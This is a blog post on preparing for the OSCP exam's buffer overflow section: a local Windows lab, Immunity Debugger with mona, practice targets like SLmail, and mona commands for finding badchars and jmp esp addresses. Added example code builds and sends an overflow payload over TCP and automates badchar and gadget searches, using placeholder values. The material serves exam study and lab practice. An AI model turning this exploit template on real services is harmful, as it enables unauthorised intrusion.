BoF OSCP Style Study Series

Yozer Garcia
Published in stolabs
5 min read · Nov 12, 2021

In my studies for the OSCP, I found that most people recommend the following applications for practicing BoF:

  • SLmail 5.5;
  • Brainpan;
  • The TryHackMe binary with 10 OSCP-style BoF exercises;
  • The binaries from the OSCP laboratory's study machine;
  • The “storageserver” binary available in the OSCP laboratory on machine LP07.

The fastest way to start practicing is to set up a local lab: basically a Windows 7 machine with the vulnerable applications installed, firewall and antivirus turned off, and the runtime analysis tools on board. That way you avoid the headaches of VPNs or the slow VMs of online lab services, and most of the apps named above are easy to find and install anywhere.

Setting up the environment

To build the machine, Microsoft provides a ready-made Windows VM for download (site linked below); after importing it you only need to:

  • Disable Windows Update and the Windows Firewall;
  • Assign a fixed IP address (optional).
Microsoft Windows VM Download site.

To install the analysis tools, that is, Immunity Debugger and mona, download Immunity here and mona from GitHub here. The Immunity Debugger installer installs Python 2.7 at the end of its own installation, so nothing else needs to be downloaded. mona.py must be copied into the “PyCommands” folder inside the Immunity Debugger installation directory. With that we already have a very functional local laboratory environment.

Download Immunity Debugger
The mona.py file in the PyCommands folder.

Getting vulnerable applications

Some applications are easy to get directly from the vendor's website or from exploit-db, but others are not. To obtain “storageserver” you need access to the OSCP laboratory VPN, or a colleague who has access and can download and share it; the same goes for the binaries of the OSCP laboratory's study machine. It is therefore highly recommended to make use of your OSCP laboratory VPN time to download all of these applications, which are there precisely for students to download. For the TryHackMe binary, I recommend building the SLmail 5.5 exploit locally first, then connecting to the TryHackMe VPN, starting the VM from the BoF series at this link, exploiting the SLmail installed on that VM, and exfiltrating the OSCP.exe binary together with its DLL.

Vulnerable applications.

BoF information and technical guides

I really like the tips from S4vitar, a Spanish hacker; his explanation of BoF is not hard to follow. Besides the written version at this link (together with all of his general OSCP tips), you can also watch his step-by-step video going from setting up the environment to obtaining a shell on the system with the BoF exploit.

The TryHackMe BoF series itself is at this link and also explains BoF step by step. “Task 2” seemed to me to explain the whole procedure very well: it details how the binary I mentioned earlier works and walks through exploiting it without giving away the buffer sizes, offsets or return addresses, which are the questions of the activity and what the student must find.

The penetration tester M0chan has a well-explained and technically detailed guide here, along with some examples of vulnerable applications.

Finally, the OSCP course material itself covers BoF quite completely and details the exploitation step by step.

Extras

As an extra, it's worth mentioning some important commands to use when building the BoF exploit.

To convert the return address into the byte order the buffer needs and add it directly, it's a good idea to use the following lines of Python:

  • from struct import pack  # add to the import section
  • addr_return = pack('<L', 0x000000)  # replace 0x000000 with the return address found

With those two lines it is no longer necessary to write the address backwards by hand and prefix each byte with “\x”: pack('<L', ...) emits the four bytes of the address in little-endian order. One caveat: under Python 3 pack() returns bytes, so the rest of the buffer must be bytes as well (b'A' * offset, not 'A' * offset), otherwise the concatenation fails.

Using struct and pack for the return address.
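To show how the packed address fits into a full buffer, here is an added example (not code from the original post) that wraps the pack('<L', ...) idiom in a small payload builder. The crash offset 2003, the return address 0x625011af, the badchar list \x00\x07 and the 8-byte INT3 stand-in for shellcode are all hypothetical values chosen for the example. The builder refuses to assemble a payload whose packed return address or shellcode contains a badchar, which is the check worth having before anything is sent.

```python
from struct import pack
import socket

# Hypothetical values for this example (not from the post): the crash offset,
# the address of a "jmp esp" in a non-rebased module, and the bytes the target
# is known to mangle. Replace them with what your own analysis found.
OFFSET = 2003
RET_ADDR = 0x625011af
BADCHARS = b"\x00\x07"

# Constructed stand-in for real shellcode: a short INT3 sled. In a real exploit
# this is msfvenom output generated with -b for the same badchar list.
SHELLCODE = b"\xcc" * 8


def pack_addr(addr):
    """Little-endian DWORD, exactly what pack('<L', addr) does in the post."""
    return pack("<L", addr)


def find_badchars(data, badchars=BADCHARS):
    """Sorted list of forbidden byte values present in data (empty = clean)."""
    return sorted({b for b in data if b in badchars})


def address_is_clean(addr, badchars=BADCHARS):
    """True when no byte of the packed address is a badchar. An address that
    looks fine in hex (0x62500700) can still hide 0x00 and 0x07 once packed."""
    return not find_badchars(pack_addr(addr), badchars)


def build_payload(offset=OFFSET, ret_addr=RET_ADDR, shellcode=SHELLCODE,
                  badchars=BADCHARS, nop_sled=16, prefix=b""):
    """Assemble prefix + junk + EIP + NOP sled + shellcode, refusing badchars.

    prefix is whatever the protocol needs in front of the overflowing field
    (for a POP3 password overflow that would be b"PASS ")."""
    if not address_is_clean(ret_addr, badchars):
        raise ValueError("return address %#010x contains badchars: %s"
                         % (ret_addr, ["%#04x" % b for b in
                                       find_badchars(pack_addr(ret_addr), badchars)]))
    bad = find_badchars(shellcode, badchars)
    if bad:
        raise ValueError("shellcode contains badchars: %s"
                         % ["%#04x" % b for b in bad])
    return prefix + b"A" * offset + pack_addr(ret_addr) + b"\x90" * nop_sled + shellcode


def send_payload(host, port, payload, read_banner=True, timeout=5):
    """Deliver the payload over TCP. Not exercised offline; shown so the
    builder above has the obvious consumer."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        if read_banner:
            s.recv(1024)
        s.sendall(payload + b"\r\n")


if __name__ == "__main__":
    p = build_payload()
    print("payload length:", len(p))
    print("EIP bytes at offset %d: %s" % (OFFSET, p[OFFSET:OFFSET + 4].hex()))
```

The example is Python 3; under the Python 2.7 that Immunity installs, pack() returns a str and the b"" literals are plain strings, so the same code runs there too as long as every part of the buffer is the same type.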

When looking for badchars, many people prefer the manual process, and there is nothing wrong with that, but I recommend a final check with mona. For that we use the following commands:

  • !mona config -set workingfolder C:\Users\meuUser\Desktop\%p  # set mona's working directory (%p expands to the process name)
  • !mona bytearray -b "\x00"  # generate the badchar array, already excluding the badchars found so far
  • !mona compare -f C:\Users\meuUser\Desktop\appName\bytearray.bin -a ADDR  # compare against memory and check that no badchars remain

First we set mona's working directory; that is where mona writes the badchar array and the file it later compares against. In the third command, ADDR is the address of the first byte of the badchar array in memory after the crash (usually found by following ESP, or whichever register points into the buffer, in the debugger). Each round, trust only the first byte mona reports as modified: once one byte is dropped or replaced, everything after it shifts, so add that byte to the -b list, regenerate the array and repeat until mona reports the array unmodified. For more details, this link has a more complete explanation, and the TryHackMe series also covers the subject.

Create the badchars array with mona.
Compare the badchars array with mona.
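The logic behind the bytearray/compare round trip, as an added example rather than mona's own code: badchar_array() builds the same 256-minus-excluded byte array that !mona bytearray -b writes, first_mismatch() does what !mona compare does against a memory dump, and find_badchars() drives the iterative loop. fake_target() is a constructed stand-in for the real service plus debugger (it truncates at NUL and rewrites 0x07 to 0x20); against a real target you would replace it with code that sends the array and returns the bytes read back from ADDR.

```python
def badchar_array(exclude=b"\x00"):
    """Every byte value 0x00..0xff except those in `exclude`: the array that
    `!mona bytearray -b "..."` writes to bytearray.bin."""
    return bytes(b for b in range(256) if b not in exclude)


def first_mismatch(expected, seen):
    """Index and expected byte at the first divergence, or None if `seen`
    begins with all of `expected` (mona's "Unmodified" verdict).

    Only the first difference is trusted: once a byte is dropped, replaced
    or expanded, everything after it shifts and would be misreported."""
    for i, b in enumerate(expected):
        if i >= len(seen) or seen[i] != b:
            return i, b
    return None


def find_badchars(send_and_dump, initial=b"\x00", max_rounds=32):
    """Repeat: build the array without known badchars, send it, read memory
    back, exclude the first byte that changed. Stops on an unmodified dump."""
    bad = bytearray(initial)
    for _ in range(max_rounds):
        arr = badchar_array(bytes(bad))
        mismatch = first_mismatch(arr, send_and_dump(arr))
        if mismatch is None:
            return bytes(bad)
        bad.append(mismatch[1])
    raise RuntimeError("still finding badchars after %d rounds" % max_rounds)


def fake_target(data):
    """Constructed stand-in for "send to the service, then dump the buffer in
    the debugger": it stops copying at the first NUL and its input filter
    turns 0x07 into 0x20. Real targets differ per application."""
    out = bytearray()
    for b in data:
        if b == 0x00:
            break
        out.append(0x20 if b == 0x07 else b)
    return bytes(out)


if __name__ == "__main__":
    print("badchars:", find_badchars(fake_target).hex())
```

With a real target, the dump returned by send_and_dump is whatever you copy out of the debugger at ADDR; mona's own bytearray.bin can be read with open(path, "rb").read() and handed to first_mismatch() as the expected side.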

Finally, when looking for the return address, mona can again give you a little help with the following command:

  • !mona jmp -r esp -cpb "\x00\x07"

With the previous command mona looks for a jmp esp (it also accepts the equivalent call esp and push esp; ret) whose address contains none of the badchars given to -cpb, so the address can go straight into the buffer as the return address. It still pays to pick a hit from a module that !mona modules reports without ASLR, Rebase or SafeSEH, which mona lists next to each result.

Looking for return address with mona.
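What !mona jmp -r esp -cpb does under the hood, as an added example that is not mona's code: scan a module's bytes for the jmp esp opcodes (and the equivalents mona also accepts) and discard any hit whose address, once packed little-endian, contains a byte on the -cpb list. The module image, its base address 0x62500000 and the gadget offsets are constructed for the example; the gadget planted at 0x62500700 is rejected because its packed address contains both 0x00 and 0x07.

```python
from struct import pack

# Opcode sequences accepted as "jump to ESP" equivalents.
GADGETS = {
    b"\xff\xe4": "jmp esp",
    b"\xff\xd4": "call esp",
    b"\x54\xc3": "push esp; ret",
}


def address_has_badchars(addr, badchars):
    """True if any byte of the little-endian packed address is a badchar."""
    return any(b in badchars for b in pack("<L", addr))


def find_jmp_esp(image, base, badchars=b""):
    """Scan a module image (bytes as mapped at `base`) for the gadgets above and
    return sorted (address, mnemonic) pairs whose address has no badchar byte,
    mirroring `!mona jmp -r esp -cpb "..."`."""
    hits = []
    for pattern, name in GADGETS.items():
        pos = image.find(pattern)
        while pos != -1:
            addr = base + pos
            if not address_has_badchars(addr, badchars):
                hits.append((addr, name))
            pos = image.find(pattern, pos + 1)
    return sorted(hits)


def make_fake_module():
    """Constructed 8 KiB module at a hypothetical base, padded with NOPs, with
    three gadgets planted at chosen offsets (not a real DLL)."""
    base = 0x62500000
    img = bytearray(b"\x90" * 0x2000)
    img[0x0700:0x0702] = b"\xff\xe4"   # jmp esp  at 0x62500700 (bytes 00 07 50 62)
    img[0x11af:0x11b1] = b"\xff\xe4"   # jmp esp  at 0x625011af (clean)
    img[0x1234:0x1236] = b"\xff\xd4"   # call esp at 0x62501234 (clean)
    return bytes(img), base


if __name__ == "__main__":
    image, base = make_fake_module()
    for addr, name in find_jmp_esp(image, base, badchars=b"\x00\x07"):
        print("%#010x  %s" % (addr, name))
```

This only does the byte-pattern search and the pointer badchar filter; mona additionally reports each hit's module and its protections (ASLR, Rebase, SafeSEH, NXCompat), so in practice you point a search like this at a module that !mona modules shows as unprotected.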

Finally, I know that depending on the applications being studied some extra configuration will be needed, but since the goal was to create a basic, fast and useful environment to focus on studying for the OSCP exam, I didn't feel the need for more advanced settings; the configuration described here fulfills that objective satisfactorily.

I would like to thank Microsoft for making the VMs available for free, the folks at TryHackMe for creating the BoF series, and S4vitar for sharing his experiences with the OSCP exam.
